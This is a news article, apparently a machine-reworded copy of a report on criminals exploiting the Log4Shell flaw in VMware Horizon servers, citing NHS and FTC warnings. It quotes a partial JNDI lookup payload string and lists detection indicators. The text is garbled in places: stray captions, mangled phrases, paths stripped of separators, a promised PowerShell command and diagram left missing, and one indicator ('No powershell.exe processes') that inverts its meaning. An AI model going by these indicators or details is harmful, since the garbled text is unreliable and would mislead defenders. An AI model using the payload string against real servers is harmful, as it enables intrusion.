Patch systems are vulnerable to critical Log4j flaws, UK and US officials warn.

Patch systems are vulnerable to critical Log4j flaws, UK and US officials warn.

fake images

Criminals are actively exploiting the high severity Log4Shell vulnerability on servers running VMware Horizon in an attempt to install malware that allows them to gain full control of affected systems, warns the UK publicly funded healthcare system.

CVE-2021-44228 It is one of the most serious vulnerabilities that have come to light in recent years. It resides in Log4J, a library of system log codes that is used by thousands, if not millions, of third-party websites and applications. That means there is a large base of vulnerable systems. Furthermore, the vulnerability is extremely easy to exploit and allows attackers to install web shells, which provide a command window to execute elevated-privilege commands on hacked servers.

The remote code execution flaw in Log4J came to light in December after the exploit code was released before a patch was available. Malicious hackers quickly began actively exploiting CVE-2021-44228 to compromise sensitive systems.

The attacks, including those targeting VMware Horizon, have continued ever since.

“An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within the affected networks ”, UK National Health System officials wrote. They continued to provide guidance on specific steps affected organizations can take to mitigate the threat.

The main one is the recommendation to install an update that Launch of VMware for its Horizon product, which provides organizations with a means to virtualize desktop and application capabilities using the company’s virtualization technology. NHS officials also noted signs that vulnerable organizations can look for to identify any possible attacks they may have suffered.

The notice comes a day after the Federal Trade Commission warned consumer-oriented companies to patch vulnerable systems to avoid the fate of Equifax. In 2019, the credit reporting agency agreed to pay $ 575 million to settle FTC charges resulting from failing to patch an equally serious vulnerability in different software known as Apache Struts. When an unknown attacker exploited the vulnerability in the Equifax network, it compromised the confidential information of 143 million people, making it one of the worst data breaches in history.

“The FTC intends to use all of its legal authority to prosecute companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j or similar known vulnerabilities in the future,” FTC officials said. saying

The NHS is at least the second organization to observe exploits targeting a VMware product. Last month, researchers reported that the attackers were targeting systems running VMware VCenter to install the Conti ransomware.

Attacks targeting unpatched VMware Horizon servers target the use of an open source service.

“The attack is most likely initiated through a Log4Shell payload similar to $ {jndi: ldap: //},” the NHS advisory stated. “The attack exploits the Log4Shell vulnerability in the Apache Tomcat service that is built into VMware Horizon. This then launches the following PowerShell command, generated from ws_TomcatService.exe: “


After a few additional steps, attackers can install a web shell that has persistent communication with a server they control. Here is a representation of the attack:


The notice added:

Organizations should look for the following:

  • Evidence of ws_TomcatService.exe spawning abnormal processes
  • No powershell.exe processes containing ‘VMBlastSG’ on the command line
  • File modifications to ‘… VMware VMware View Server appblastgateway lib absg-worker.js’ – This file is generally overwritten during updates and remains unchanged

Security firm Praetorian published on Friday this tool to identify vulnerable systems at scale.

Leave a Reply

Your email address will not be published. Required fields are marked *